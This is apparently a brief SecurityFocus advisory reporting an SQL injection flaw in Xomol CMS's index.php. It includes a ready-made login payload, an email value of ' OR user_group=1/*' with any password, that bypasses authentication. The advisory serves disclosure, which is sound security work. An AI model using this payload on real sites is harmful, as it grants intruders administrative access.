Xomol CMS 'index.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example is available:

Login with email: " OR user_group=1/*"" and password: not empty


 

Privacy Statement
Copyright 2010, SecurityFocus